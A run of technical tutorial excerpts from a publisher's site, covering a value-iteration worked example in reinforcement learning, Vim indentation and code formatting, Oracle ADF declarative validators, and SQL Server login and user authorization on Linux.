RIGHT    | G  | 0.8 | +1 | 0.8 x 1 = 0.8
RIGHT    | C  | 0.1 | 0  | 0.1 x 0 = 0
RIGHT    | X  | 0.1 | 0  | 0.1 x 0 = 0

Thus, for action a = RIGHT, the sum is 0.8.

Action a | s' | T(s,a,s') | U_0(s') | T x U_0
DOWN     | C  | 0.8 | 0  | 0.8 x 0 = 0
DOWN     | G  | 0.1 | +1 | 0.1 x 1 = 0.1
DOWN     | A  | 0.1 | 0  | 0.1 x 0 = 0

Thus, for action a = DOWN, the sum is 0.1.

Action a | s' | T(s,a,s') | U_0(s') | T x U_0
UP       | X  | 0.8 | 0  | 0.8 x 0 = 0
UP       | G  | 0.1 | +1 | 0.1 x 1 = 0.1
UP       | A  | 0.1 | 0  | 0.1 x 0 = 0

Thus, for action a = UP, the sum is 0.1.

Action a | s' | T(s,a,s') | U_0(s') | T x U_0
LEFT     | A  | 0.8 | 0 | 0.8 x 0 = 0
LEFT     | X  | 0.1 | 0 | 0.1 x 0 = 0
LEFT     | C  | 0.1 | 0 | 0.1 x 0 = 0

Thus, for action a = LEFT, the sum is 0.

Therefore, among all actions, max_a Σ_s' T(X,a,s') U_0(s') = 0.8 (for a = RIGHT). Therefore, U_1(X) = R(X) + γ x 0.8 = -0.04 + 0.5 x 0.8 = 0.36, where R(X) = -0.04 and γ = 0.5. Similarly, calculate U_1(C) and U_1(A), and we get U_1(C) = -0.04 and U_1(A) = -0.04.

Since U_1(X) = 0.36, U_1(C) = -0.04, U_1(A) = -0.04, and R(X) = -0.04:

Action a | s' | T(s,a,s') | U_1(s') | T x U_1
RIGHT    | G  | 0.8 | +1    | 0.8 x 1 = 0.8
RIGHT    | C  | 0.1 | -0.04 | 0.1 x -0.04 = -0.004
RIGHT    | X  | 0.1 | 0.36  | 0.1 x 0.36 = 0.036

Thus, for action a = RIGHT, the sum is 0.832.

Action a | s' | T(s,a,s') | U_1(s') | T x U_1
DOWN     | C  | 0.8 | -0.04 | 0.8 x -0.04 = -0.032
DOWN     | G  | 0.1 | +1    | 0.1 x 1 = 0.1
DOWN     | A  | 0.1 | -0.04 | 0.1 x -0.04 = -0.004

Thus, for action a = DOWN, the sum is 0.064.

Action a | s' | T(s,a,s') | U_1(s') | T x U_1
UP       | X  | 0.8 | 0.36  | 0.8 x 0.36 = 0.288
UP       | G  | 0.1 | +1    | 0.1 x 1 = 0.1
UP       | A  | 0.1 | -0.04 | 0.1 x -0.04 = -0.004

Thus, for action a = UP, the sum is 0.384.

Action a | s' | T(s,a,s') | U_1(s') | T x U_1
LEFT     | A  | 0.8 | -0.04 | 0.8 x -0.04 = -0.032
LEFT     | X  | 0.1 | 0.36  | 0.1 x 0.36 = 0.036
LEFT     | C  | 0.1 | -0.04 | 0.1 x -0.04 = -0.004

Thus, for action a = LEFT, the sum is 0.

Therefore, among all actions, max_a Σ_s' T(X,a,s') U_1(s') = 0.832 (again for a = RIGHT). Therefore, U_2(X) = R(X) + γ x 0.832 = -0.04 + 0.5 x 0.832 = 0.376, where R(X) = -0.04 and γ = 0.5.

Therefore, the answers to the preceding questions are: U_1(X) = 0.36 and U_2(X) = 0.376.

Policy iteration

The process of obtaining optimal utility by iterating over the policy and updating the policy itself instead of the value until the policy converges to the optimum is called policy iteration. The process of policy iteration is as follows:
Start with a random policy, π_0.
For the given π_t policy at iteration step t, calculate the utilities of the states by using the following formula: U^π_t(s) = R(s) + γ Σ_s' T(s, π_t(s), s') U^π_t(s').
Improve the policy by π_(t+1)(s) = argmax_a Σ_s' T(s,a,s') U^π_t(s').
This ends an interesting reinforcement learning tutorial. Want to implement state-of-the-art Reinforcement Learning algorithms from scratch? Get this best-selling title, Reinforcement Learning with TensorFlow. How Reinforcement Learning works Convolutional Neural Networks with Reinforcement Learning Getting started with Q-learning using TensorFlow
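As a recap of the value-iteration arithmetic worked through above, here is a small Python sketch. It is an illustration rather than code from the book: it hard-codes only state X's transition rows exactly as they appear in the tables, takes gamma = 0.5 and the -0.04 step reward from the example, and reuses the given values U_1(C) = U_1(A) = -0.04 instead of computing the full grid.

# Value-iteration arithmetic for the worked example above.
GAMMA = 0.5
STEP_REWARD = -0.04

# Transition model for state X only, as listed in the tables:
# action -> list of (next_state, probability)
T_X = {
    "RIGHT": [("G", 0.8), ("C", 0.1), ("X", 0.1)],
    "DOWN":  [("C", 0.8), ("G", 0.1), ("A", 0.1)],
    "UP":    [("X", 0.8), ("G", 0.1), ("A", 0.1)],
    "LEFT":  [("A", 0.8), ("X", 0.1), ("C", 0.1)],
}

def bellman_backup(utilities):
    """One Bellman update for state X given the current utility estimates."""
    best = max(
        sum(prob * utilities[s_next] for s_next, prob in outcomes)
        for outcomes in T_X.values()
    )
    return STEP_REWARD + GAMMA * best

# U_0: only the terminal states carry utility at the start.
u0 = {"X": 0.0, "A": 0.0, "C": 0.0, "G": 1.0, "B": -1.0}
u1_x = bellman_backup(u0)

# For U_2(X), the text supplies U_1(C) = U_1(A) = -0.04.
u1 = {"X": u1_x, "A": -0.04, "C": -0.04, "G": 1.0, "B": -1.0}
u2_x = bellman_backup(u1)

print(f"U_1(X) = {u1_x:.3f}")
print(f"U_2(X) = {u2_x:.3f}")

Running it prints U_1(X) = 0.360 and U_2(X) = 0.376, matching the hand calculation.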

Vim 7.2 Formatting Code

Packt
30 Apr 2010
11 min read
Formatting code often depends on many different things. Each programming language has its own syntax, and some languages rely on formatting like indentation more than others. In some cases, the programmer is following style guidelines given by an employer so that code can follow the company-wide style. So, how should Vim know how you want your code to be formatted? The short answer is that it shouldn't! But by being flexible, Vim can let you set up exactly how you want your formatting done. However, the fact is that even though formatting differs, most styles of formatting follow the same basic rules. This means that in reality, you only have to change the things that differ. In most cases, the changes can be handled by changing a range of settings in Vim. Among these, there are a few especially worth mentioning: Formatoptions: This setting holds formatting-specific settings (see :help 'fo') Comments: What are comments and how they should be formatted (see :help 'co') (no)expandtab: Convert tabs to spaces (see :help 'expandtab') Softtabstop: How many spaces a single tab is converted to (see :help 'sts') Tabstop: How many spaces a tab looks like (see :help 'ts') With these options, you can set nearly every aspect of how Vim will indent your code, and whether it should use spaces or tabs for indentation. But this is not enough because you still have to tell Vim if it should actually try to do the indentation for you, or if you want to do it manually. It you want Vim to do the indentation for you, you have the choice between four different ways for Vim to do it. In the following sections, we will look at the options you can set to interact with the way Vim indents code. Autoindent Autoindent is the simplest way of getting Vim to indent your code. It simply stays at the same indentation level as the previous line. So, if the current line is indented with four spaces, then the new line you add by pressing Enter will automatically be indented with four spaces too. It is then up to you as to how and when the indentation level needs to change again. This type of indentation is particularly good for languages where the indentation stays the same for several lines in a row. You get autoindent by using :set, autoindent, or :set ai. Smartindent Smartindent is the next step when you want a smarter indent than autoindent. It still gives you the indentation from the previous line, but you don't have to change the indentation level yourself. Smartindent recognizes the most common structures from the C programming language and uses this as a marker for when to add / remove the indentation levels. As many languages are loosely based on the same syntax as C, this will work for those languages as well. You get smart indent by using any of the following commands: :set smartindent :set si Cindent Cindent is often called clever indent or configurable indent because it is more configurable than the previous two indentation methods. You have access to three different setup options: cinkeys This option contains a comma-separated list of keys that Vim should use to change the indentation level. An example could be: :set cinkeys="0{,0},0#,:", which means that it should reindent whenever it hits a {, a } or a # as the first character on the line, or if you use : as the last character on the line (as used in switch constructs in many languages).The default value for cinkeys is "0{, 0}, 0), :, 0#, !^F, o, O, and e". See :help cinkeys for more information on what else you can set in this option. 
cinoptions This option contains all the special options you can set specifically for cindent. A large range of options can be set in this comma-separated list. An example could be:set cinoptions=">2,{3,}3", which means that we want Vim to add two extra spaces to the normal indent length, and we want to place { and } three spaces as compared to the previous line. So, if we have a normal indent to be four spaces, then the previous example could result in the code looking like this (dot marks represent a space): if( a == b) ...{ ......print "hello"; ...} The default value for cinoptions is this quite long string: ">s,e0,n0,f0,{0,}0,^0,:s,=s,l0,b0,gs,hs,ps,ts,is,+s,c3,C0,/0,(2s,us,U0,w0,W0,m0,j0,)20,*30" . See :help 'cinoptions' for more information on all the options. cinwords This option contains all the special keywords that will make Vim add indentation on the next line. An example could be: :set cinwords="if,else,do,while,for,switch", which is also the default value for this option. See :help 'cinwords' for more information. Indentexpr Indentexpr is the most flexible indent option to use, but also the most complex. When used, indentexpr evaluates an expression to compute the indent of a line. Hence, you have to write an expression that Vim can evaluate. You can activate this option by simply setting it to a specific expression such as: :set indentexpr=MyIndenter() Here, MyIndenter() is a function that computes the indentation for the lines it is executed on. A very simple example could be a function that emulates the autoindent option: function! MyIndenter() " Find previous line and get its indentation let prev_lineno = s:prevnonblank(v:lnum) let ind = indent( prev_lineno ) return indendfunction Adding just a bit more functionality than this, the complexity increases quite fast. Vim comes with a lot of different indent expressions for many programming languages. These can serve as inspiration if you want to write your own indent expression. You can find them in the indent folder in your VIMHOME. You can read more about how to use indentexpr in :help 'indentexpr' and :help 'indent-expression'. Fast code-block formatting After you have configured your code formatting, you might want to update your code to follow these settings. To do so, you simply have to tell Vim that it should reindent every single line in the file from the first line to the last. This can be done with the following Vim command: 1G=G If we split it up, it simply says: 1G: Go to the first line of the file (alternatively you can use gg) =: Equalize lines; in other words, indent according to formatting configuration G: Go to the last line in the file (tells Vim where to end indenting) You could easily map this command to a key in order to make it easily accessible: :nmap <F11> 1G=G:imap <F11> <ESC>1G=Ga The last a is to get back into the insert mode as this was where we originally were. So, now you can just press the F11key in order to reindent the entire buffer correctly. Note that if you have a programmatic error, for example, missing a semicolon at the end of a line in a C program, the file will not be correctly indented from that point on in the buffer. This can sometimes be useful to identify where a scope is not closed correctly (for example, a { not closed with a } ). Sometimes, you might just want to format smaller blocks of code. In those cases, you typically have two options—use the natural scope blocks in the code, or select a block of code in the visual mode and indent it. The last one is simple. 
Go into the visual mode with, for example,Shift+v and then press = to reindent the lines. When it comes to using code blocks on the other hand, there are several different ways to do it. In Vim, there are multiple ways to select a block of code. So in order to combine a command that indents a code block, we need to look at the different types and the commands to select them: i{ Inner block, which means everything between { and } excluding the brackets. This can also be selected with i} and iB. a{ A block, which means all the code between { and } including the brackets. This can also be selected with a} and aB. i( Inner parenthesis, meaning everything between ( and ) excluding the parentheses. Can also be selected with i) and ib. a( A parentheses, meaning everything between ( and ) including the parenthesis. Can also be selected with a) and ab. i< Inner < > block, meaning everything between < and > excluding the brackets. Can also be selected with i>. a< A < > block, meaning everything between < and > including the brackets. Can also be selected with a>. i[ Inner [ ] block, meaning everything between [ and ] excluding the square brackets. Can also be selected with i]. a[ A [ ] block, meaning everything between [ and ], including the square brackets. This can also be selected with a]. So, we have defined what Vim sees a block of code as; now, we simply have to tell it what to do with the block. In our case, we want to reindent the code. We already know that = can do this. So, an example of a code block reindentation could look like this: =i{ Let's execute the code block reindentation in the following code (| being the place where the cursor is): if( a == b ) { print |"a equals b"; } This would produce the following code (with default C format settings): if( a == b ) { print |"a equals b"; } If, on the other hand, we choose to use a { as the block we are working on, then the resulting code would look like this: if( a == b ) { print "a equals b"; } As you can see in the last piece of code, the =a{ command corrects the indentation of both the brackets and the print line. In some cases where you work in a code block with multiple levels of code blocks, you might want to reindent the current block and maybe the surrounding one. No worries, Vim has a fast way to do this. If, for instance, you want to reindent the current code block and besides that want to reindent the block that surrounds it, you simply have to execute the following command while the cursor is placed in the innermost block: =2i{ This simply tells Vim that you will equalize / reindent two levels of inner blocks counting from the "active" block and out. You can replace the number 2 with any number of levels of code blocks you want to reindent. Of course, you can also swap the inner block command with any of the other block commands, and that way select exactly what you want to reindent. So, this is really all it takes to get your code to indent according to the setup you have. Auto format pasted code The trend among programmers tells us that we tend to reuse parts of our code, or so-called patterns. This could mean that you have to do a lot of copying and pasting of code. Most users of Vim have experienced what is often referred to as the stair effect when pasting code into a file. This effect occurs when Vim tries to indent the code as it inserts it. This often results in each new line to be indented to another level, and you ending up with a stair: code line 1 code line 2 codeline 3 code line 4 ... 
The normal workaround for this is to go into the paste-mode in Vim, which is done by using: :set paste After pasting your code, you can now go back to your normal insert mode again: :set nopaste But what if there was another workaround? What if Vim could automatically indent the pasted code such that it is indented according to the rest of the code in the file? Vim can do that for you with a simple paste command. p=`] This command simply combines the normal paste command (p) with a command that indents the previously inserted lines (=`]). It actually relies on the fact that when you paste with p (lowercase), the cursor stays on the first character of the pasted text. This is combined with `], which takes you to the last character of the latest inserted text and gives you a motion across the pasted text from the first line to the last. So, all you have to do now is map this command to a key and then use this key whenever you paste a piece of code into your file. Using external formatting tools Even though experienced Vim users often say that Vim can do everything, this is of course not the truth—but is close. For those things that Vim can't do, it is smart enough to be able to use external tools. In the following sections, we will take a look at some of the most used external tools that can be used for formatting your code, and how to use them.
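As a preview of how such an integration typically looks, the lines below route Vim's = command through an external formatter by way of the 'equalprg' option. This is a generic sketch: clang-format is only an example formatter, and you would substitute whichever tool matches your language.

" Use an external formatter whenever = is used (clang-format is just an example)
:set equalprg=clang-format

" The familiar commands from this article now run the external tool instead:
" reformat the whole buffer
1G=G
" reformat the current code block
=i{

" Alternatively, filter the whole buffer through a one-off command without
" changing any options:
:%!clang-format

" To return to Vim's built-in indenting, clear the option again:
:set equalprg=

The same pattern works with the 'formatprg' option and the gq command when you want an external tool to reflow text or comments.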

Validating and Using the Model Data

Packt
07 May 2013
14 min read
(For more resources related to this topic, see here.) Declarative validation It's easy to set up declarative validation for an entity object to validate the data that is passed through the metadata file. Declarative validation is the validation added for an attribute or an entity object to fulfill a particular business validation. It is called declarative validation because we don't write any code to achieve the validation as all the business validations are achieved declaratively. The entity object holds the business rules that are defined to fulfill specific business needs such as a range check for an attribute value or to check if the attribute value provided by the user is a valid value from the list defined. The rules are incorporated to maintain a standard way to validate the data. Knowing the lifecycle of an entity object It is important to know the lifecycle of an entity object before knowing the validation that is applied to an entity object. The following diagram depicts the lifecycle of an entity: When a new row is created using an entity object, the status of the entity is set to NEW. When an entity is initialized with some values, the status is changed from NEW to INITIALIZED. At this time, the entity is marked invalid or dirty; this means that the state of the entity is changed from the value that was previously checked with the database value. The status of an entity is changed to UNMODIFIED, and the entity is marked valid after applying validation rules and committing to the database. When the value of an unmodified entity is changed, the status is changed to MODIFIED and the entity is marked dirty again. The modified entity again goes to an UNMODIFIED state when it is saved to the database. When an entity is removed from the database, the status is changed to DELETED. When the value is committed, the status changes to DEAD. Types of validation Validation rules are applied to an entity to make sure that only valid values are committed to the database and to prevent any invalid data from getting saved to the database. In ADF, we use validation rules for the entity object to make sure the row is valid all the time. There are three types of validation rules that can be set for the entity objects; they are as follows: Entity-level validation Attribute-level validation Transaction-level validation Entity-level validation As we know, an entity represents a row in the database table. Entity-level validation is the business rule that is added to the database row. For example, the validation rule that has to be applied to a row is termed as entity-level validation. There are two unique declarative validators that will be available only for entity-level validation—Collection and UniqueKey. The following diagram explains that entity-level validations are applied on a single row in the EMP table. The validated row is highlighted in bold. Attribute-level validation Attribute-level validations are applied to attributes. Business logic mostly involves specific validations to compare different attribute values or to restrict the attributes to a specific range. These kinds of validations are done in attribute-level validation. Some of the declarative validators available in ADF are Compare, Length, and Range. The Precision and Mandatory attribute validations are added, by default, to the attributes from the column definition in the underlying database table. We can only set the display message for the validation. 
The following diagram explains that the validation is happening on the attributes in the second row: There can be any number of validations defined on a single attribute or on multiple attributes in an entity. In the diagram, Empno has a validation that is different from the validation defined for Ename. Validation for the Job attribute is different from that for the Sal attribute. Similarly, we can define validations for attributes in the entity object. Transaction-level validation Transaction-level validations are done after all entity-level validations are completed. If you want to add any kind of validation at the end of the process, you can defer the validation to the transaction level to ensure that the validation is performed only once. Built-in declarative validators ADF Business Components includes some built-in validators to support and apply validations for entity objects. The following screenshot explains how a declarative validation will show up in the Overview tab: The Business Rules section for the EmpEO.xml file will list all the validations for the EmpEO entity. In the previous screenshot, we will see that the there are no entity-level validators defined and some of the attribute-level validations are listed in the Attributes folder. Collection validator A Collection validator is available only for entity-level validation. To perform operations such as average, min, max, count, and sum for the collection of rows, we use the collection validator. Collection validators are compared to the GROUP BY operation in an SQL query with a validation. The aggregate functions, such as count, sum, min, and max are added to validate the entity row. The validator is operated against the literal value, expression, query result, and so on. You must have the association accessor to add a collection validation. Time for action – adding a collection validator for the DeptEO file Now, we will add a Collection validator to DeptEO.xml for adding a count validation rule. Imagine a business rule that says that the number of employees added to department number 10 should be more than five. In this case, you will have a count operation for the employees added to department number 10 and show a message if the count is less than 5 for a particular department. We will break this action into the following three parts: Adding a declarative validation: In this case, the number of employees added to the department should be greater than five Specifying the execution rule: In our case, the execution of this validation should be fired only for department number 10 Displaying the error message: We have to show an error message to the user stating that the number of employees added to the department is less than five Adding the validation Following are the steps to add the validation: Go to the Business Rules section of DeptEO.xml. You will find the Business Rules section in the Overview tab. Select Entity Validators and click on the + button. You may right-click on the Entity Validators folder and then select New Validator to add a validator. Select Collection as Rule Type and move on to the Rule Definition tab. In this section, select Count for the Operation field; Accessor is the association accessor that gets added through a composition association relationship. Only the composition association accessor will be listed in the Accessor drop-down menu. Select the accessor for EmpEO listed in the dropdown, with Empno as the value for Attribute. 
In order to create a composition association accessor, you will have to create an association between DeptEO.xml and EmpEO.xml based on the Deptno attribute with cardinality of 1 to *. The Composition Association option has to be selected to enable a composition relationship between the two entities. The value of the Operator option should be selected as Greater Than. Compare with will be a literal value, which is 5 that can be entered in the Enter Literal Value section below. Specifying the execution rule Following are the steps to specify the execution: Now to set the execution rule, we will move to the Validation Execution tab. In the Conditional Execution section, add Deptno = '10' as the value for Conditional Execution Expression. In the Triggering Attribute section, select the Execute only if one of the Selected Attributes has been changed checkbox. Move the Empno attribute to the Selected Attributes list. This will make sure that the validation is fired only if the Empno attribute is changed: Displaying the error message Following are the steps to display the error message: Go to the Failure Handling section and select the Error option for Validation Failure Severity. In the Failure Message section, enter the following text: Please enter more than 5 Employees You can add the message stored in a resource bundle to Failure Message by clicking on the magnifying glass icon. What just happened? We have added a collection validation for our EmpEO.xml object. Every time a new employee is added to the department, the validation rule fires as we have selected Empno as our triggering attribute. The rule is also validated against the condition that we have provided to check if the department number is 10. If the department number is 10, the count for that department is calculated. When the user is ready to commit the data to the database, the rule is validated to check if the count is greater than 5. If the number of employees added is less than 5, the error message is displayed to the user. When we add a collection validator, the EmpEO.xml file gets updated with appropriate entries. The following entries get added for the aforementioned validation in the EmpEO.xml file: <validation:CollectionValidationBean Name="EmpEO_Rule_0" ResId= "com.empdirectory.model.entity.EmpEO_Rule_0" OnAttribute="Empno" OperandType="LITERAL" Inverse="false" CompareType="GREATERTHAN" CompareValue="5" Operation="count"> <validation:OnCondition> <![CDATA[Deptno = '10']]> </validation:OnCondition> </validation:CollectionValidationBean> <ResourceBundle> <PropertiesBundle PropertiesFile= "com.empdirectory.model.ModelBundle"/> </ResourceBundle> The error message that is added in the Failure Handling section is automatically added to the resource bundle. The Compare validator The Compare validator is used to compare the current attribute value with other values. The attribute value can be compared against the literal value, query result, expression, view object attribute, and so on. The operators supported are equal, not-equal, less-than, greater-than, less-than or equal to, and greater-than or equal to. The Key Exists validator This validator is used to check if the key value exists for an entity object. The key value can be a primary key, foreign key, or an alternate key. The Key Exists validator is used to find the key from the entity cache, and if the key is not found, the value is determined from the database. Because of this reason, the Key Exists validator is considered to give better performance. 
For example, when an employee is assigned to a department deptNo 50 and you want to make sure that deptNo 50 already exists in the DEPT table. The Length validator This validator is used to check the string length of an attribute value. The comparison is based on the character or byte length. The List validator This validator is used to create a validation for the attribute in a list. The operators included in this validation are In and NotIn. These two operators help the validation rule check if an attribute value is in a list. The Method validator Sometimes, we would like to add our own validation with some extra logic coded in our Java class file. For this purpose, ADF provides a declarative validator to map the validation rule against a method in the entity-implementation class. The implementation class is generated in the Java section of the entity object. We need to create and select a method to handle method validation. The method is named as validateXXX(), and the returned value will be of the Boolean type. The Range validator This validator is used to add a rule to validate a range for the attribute value. The operators included are Between and NotBetween. The range will have a minimum and maximum value that can be entered for the attribute. The Regular Expression validator For example, let us consider that we have a validation rule to check if the e-mail ID provided by the user is in the correct format. For the e-mail validation, we have some common rules such as the following: The e-mail ID should start with a string and end with the @ character The e-mail ID's last character cannot be the dot (.) character Two @ characters are not allowed within an e-mail ID For this purpose, ADF provides a declarative Regular Expression validator. We can use the regex pattern to check the value of the attribute. The e-mail address and the US phone number pattern is provided by default: Email: [A-Z0-9._%+-]+@[A-Z0-,9.-]+.[A-Z]{2,4} Phone Number (US): [0-9]{3}-?[0-9]{3}-?[0-9]{4} You should select the required pattern and then click on the Use Pattern button to use it. Matches and NotMatches are the two operators that are included with this validator. The Script validator If we want to include an expression and validate the business rule, the Script validator is the best choice. ADF supports Groovy expressions to provide Script validation for an attribute. The UniqueKey validator This validator is available for use only for entity-level validation. To check for uniqueness in the record, we would be using this validator. If we have a primary key defined for the entity object, the Uniqueness Check Definition section will list the primary keys defined to check for uniqueness, as shown in the following screenshot: If we have to perform a uniqueness check against any attribute other than the primary key attributes, we will have to create an alternate key for the entity object. Time for action – creating an alternate key for DeptEO Currently, the DeptEO.xml file has Deptno as the primary key. We would add business validation that states that there should not be a way to create a duplicate of the department name that is already available. The following steps show how to create an alternate key: Go to the General section of the DeptEO.xml file and expand the Alternate Keys section. Alternate keys are keys that are not part of the primary key. Click on the little + icon to add a new alternate key. Move the Dname attribute from the Available list to the Selected list and click on the OK button. 
What just happened? We have created an alternate key against the Dname attribute to prepare for a unique check validation for the department name. When the alternate key is added to an entity object, we will see the AltKey attribute listed in the Alternate Key section of the General tab. In the DeptEO.xml file, you will find the following code that gets added for the alternate key definition: <Key Name="AltKey" AltKey="true"> <DesignTime> <Attr Name="_isUnique" Value="true"/> <Attr Name="_DBObjectName" Value="HR.DEPT"/> </DesignTime> <AttrArray Name="Attributes"> <Item Value= "com.empdirectory.model.entity.DeptEO.Dname"/> </AttrArray> </Key> Have a go hero – compare the attributes For the first time, we have learned about the validations in ADF. So it's time for you to create your own validation for the EmpEO and DeptEO entity objects. Add validations for the following business scenarios: Continue with the creation of the uniqueness check for the department name in the DeptEO.xml file. The salary of the employees should not be greater than 1000. Display the following message if otherwise: Please enter Salary less than 1000. Display the message invalid date if the employee's hire date is after 10-10-2001. The length of the characters entered for Dname of DeptEO.xml should not be greater than 10. The location of a department can only be NEWYORK, CALIFORNIA, or CHICAGO. The department name should always be entered in uppercase. If the user enters a value in lowercase, display a message. The salary of an employee with the MANAGER job role should be between 800 and 1000. Display an error message if the value is not in this range. The employee name should always start with an uppercase letter and should end with any character other than special characters such as :, ;, and _. After creating all the validations, check the code and tags generated in the entity's XML file for each of the aforementioned validations.
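As a rough illustration of the Method validator described earlier, applied to the salary rule from the exercise list above, the entity implementation class could contain something like the following sketch. The class name EmpEOImpl, the parameter type, and the null handling are assumptions for illustration only; JDeveloper generates the actual method skeleton when you create the validator:

package com.empdirectory.model.entity;

import java.math.BigDecimal;

import oracle.jbo.server.EntityImpl;

// Hypothetical entity implementation class for EmpEO; the exact signature
// generated by JDeveloper may differ in a real project.
public class EmpEOImpl extends EntityImpl {

    // Method validator mapped to the Sal attribute; returning false raises
    // the failure message configured for the rule in the validator dialog.
    public boolean validateSal(Object sal) {
        if (sal == null) {
            return true; // leave null checks to a mandatory-attribute rule
        }
        // Business rule from the exercise: salary must not be greater than 1000
        return new BigDecimal(sal.toString()).compareTo(new BigDecimal(1000)) <= 0;
    }
}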

Get SQL Server user management right

Vijin Boricha
10 Apr 2018
8 min read
The question who are you sounds pretty simple, right? Well, possibly not where philosophy is concerned, and neither is it where databases are concerned either. But user management is essential for anyone managing databases. In this tutorial, learn how SQL server user management works - and how to configure it in the right way. SQL Server user management: the authentication process During the setup procedure, you have to select a password which actually uses the SQL Server authentication process. This database engine comes from Windows and it is tightly connected with Active Directory and internal Windows authentication. In this phase of development, SQL Server on Linux only supports SQL authentication. SQL Server has a very secure entry point. This means no access without the correct credentials. Every information system has some way of checking a user's identity, but SQL Server has three different ways of verifying identity, and the ability to select the most appropriate method, based on individual or business needs. When using SQL Server authentication, logins are created on SQL Server. Both the user name and the password are created by using SQL Server and stored in SQL Server. Users connecting through SQL Server authentication must provide their credentials every time that they connect (user name and password are transmitted through the network). Note: When using SQL Server authentication, it is highly recommended to set strong passwords for all SQL Server accounts.  As you'll have noticed, so far you have not had any problems accessing SQL Server resources. The reason for this is very simple. You are working under the sa login. This login has unlimited SQL Server access. In some real-life scenarios, sa is not something to play with. It is good practice to create a login under a different name with the same level of access. Now let's see how to create a new SQL Server login. But, first, we'll check the list of current SQL Server logins. To do this, access the sys.sql_logins system catalog view and three attributes: name, is_policy_checked, and is_expiration_checked. The attribute name is clear; the second one will show the login enforcement password policy; and the third one is for enforcing account expiration. Both attributes have a Boolean type of value: TRUE or FALSE (1 or 0). Type the following command to list all SQL logins: 1> SELECT name, is_policy_checked, is_expiration_checked 2> FROM sys.sql_logins 3> WHERE name = 'sa' 4> GO name is_policy_checked is_expiration_checked -------------- ----------------- --------------------- sa 1 0 (1 rows affected) 2. If you want to see what your password for the sa login looks like, just type this version of the same statement. This is the result of the hash function: 1> SELECT password_hash 2> FROM sys.sql_logins 3> WHERE name = 'sa' 4> GO password_hash ------------------------------------------------------------- 0x0200110F90F4F4057F1DF84B2CCB42861AE469B2D43E27B3541628 B72F72588D36B8E0DDF879B5C0A87FD2CA6ABCB7284CDD0871 B07C58D0884DFAB11831AB896B9EEE8E7896 (1 rows affected) 3. Now let's create the login dba, which will require a strong password and will not expire: 1> USE master 2> GO Changed database context to 'master'. 1> CREATE LOGIN dba 2> WITH PASSWORD ='S0m3c00lPa$$', 3> CHECK_EXPIRATION = OFF, 4> CHECK_POLICY = ON 5> GO 4. 
Re-check the dba login in the login list:

1> SELECT name, is_policy_checked, is_expiration_checked
2> FROM sys.sql_logins
3> WHERE name = 'dba'
4> GO
name is_policy_checked is_expiration_checked
----------------- ----------------- ---------------------
dba 1 0
(1 rows affected)

Notice that the dba login does not have any privileges yet. Let's check that part. First, close your current sqlcmd session by typing exit. Now connect again but, instead of using sa, connect with the dba login. After the connection has been successfully created, try to change the active database to AdventureWorks. This process, based on the login name, should look like this:

dba@tumbleweed:~> sqlcmd -S suse -U dba
Password:
1> USE AdventureWorks
2> GO
Msg 916, Level 14, State 1, Server tumbleweed, Line 1
The server principal "dba" is not able to access the database "AdventureWorks" under the current security context

As you can see, the authentication process on its own will not grant you anything. Simply put, you can enter the building but you can't open any door. You will need to pass through the process of authorization first.

Authorization process

After authenticating a user, SQL Server will then determine whether the user has permission to view and/or update data, view metadata, or perform administrative tasks (at the server level, the database level, or both). If the user, or a group of which the user is a member, has some type of permission within the instance and/or specific databases, SQL Server will let the user connect.

In a nutshell, authorization is the process of checking user access rights to specific securables. In this phase, SQL Server will check the login policy to determine whether there are any access rights at the server and/or database level. A login can have successful authentication but no access to the securables. This means that authentication is just one step before a login can proceed with any action on SQL Server.

SQL Server will check authorization on every T-SQL statement. In other words, if a user has SELECT permissions on some database, SQL Server will not check once and then forget until the next authentication/authorization process. Every statement will be verified against the policy to determine whether anything has changed.

Permissions are the set of rules that govern the level of access that principals have to securables. Permissions in an SQL Server system can be granted, revoked, or denied. Each of the SQL Server securables has associated permissions that can be granted to each principal. The only way a principal can access a resource in an SQL Server system is if it is granted permission to do so.

At this point, it is important to note that authentication and authorization are two different processes, but they work in conjunction with one another. Furthermore, the terms login and user are to be used very carefully, as they are not the same:

Login is the authentication part
User is the authorization part

Prior to accessing any database on SQL Server, the login needs to be mapped to a user. Each login can have one or many user instances in different databases. For example, one login can have read permission in AdventureWorks and write permission in WideWorldImporters. This type of granular security is a great SQL Server security feature. A login name can be the same as or different from a user name in different databases. In the following lines, we will create a database user dba based on the login dba. The process will be based on the AdventureWorks database.
After that we will try to enter the database and execute a SELECT statement on the Person.Person table: dba@tumbleweed:~> sqlcmd -S suse -U sa Password: 1> USE AdventureWorks 2> GO Changed database context to 'AdventureWorks'. 1> CREATE USER dba 2> FOR LOGIN dba 3> GO 1> exit dba@tumbleweed:~> sqlcmd -S suse -U dba Password: 1> USE AdventureWorks 2> GO Changed database context to 'AdventureWorks'. 1> SELECT * 2> FROM Person.Person 3> GO Msg 229, Level 14, State 5, Server tumbleweed, Line 1 The SELECT permission was denied on the object 'Person', database 'AdventureWorks', schema 'Person' We are making progress. Now we can enter the database, but we still can't execute SELECT or any other SQL statement. The reason is very simple. Our dba user still is not authorized to access any types of resources. Schema separation In Microsoft SQL Server, a schema is a collection of database objects that are owned by a single principal and form a single namespace. All objects within a schema must be uniquely named and a schema itself must be uniquely named in the database catalog. SQL Server (since version 2005) breaks the link between users and schemas. In other words, users do not own objects; schemas own objects, and principals own schemas. Users can now have a default schema assigned using the DEFAULT_SCHEMA option from the CREATE USER and ALTER USER commands. If a default schema is not supplied for a user, then the dbo will be used as the default schema. If a user from a different default schema needs to access objects in another schema, then the user will need to type a full name. For example, Denis needs to query the Contact tables in the Person schema, but he is in Sales. To resolve this, he would type: SELECT * FROM Person.Contact Keep in mind that the default schema is dbo. When database objects are created and not explicitly put in schemas, SQL Server will assign them to the dbo default database schema. Therefore, there is no need to type dbo because it is the default schema. You read a book excerpt from SQL Server on Linux written by Jasmin Azemović.  From this book, you will be able to recognize and utilize the full potential of setting up an efficient SQL Server database solution in the Linux environment. Check out other posts on SQL Server: How SQL Server handles data under the hood How to implement In-Memory OLTP on SQL Server in Linux How to integrate SharePoint with SQL Server Reporting Services
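The excerpt above leaves the dba user able to enter AdventureWorks but unable to read anything. As a minimal, hedged sketch of the next authorization step (not shown in the excerpt), the sa login could grant read access on the Person schema as follows:

1> USE AdventureWorks
2> GO
1> GRANT SELECT ON SCHEMA::Person TO dba
2> GO

After reconnecting as dba, the SELECT statement on Person.Person shown earlier should succeed. Alternatively, adding the user to the db_datareader fixed database role would grant read access to every schema in the database.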

Creating an Extension in Yii 2

Packt
24 Sep 2014
22 min read
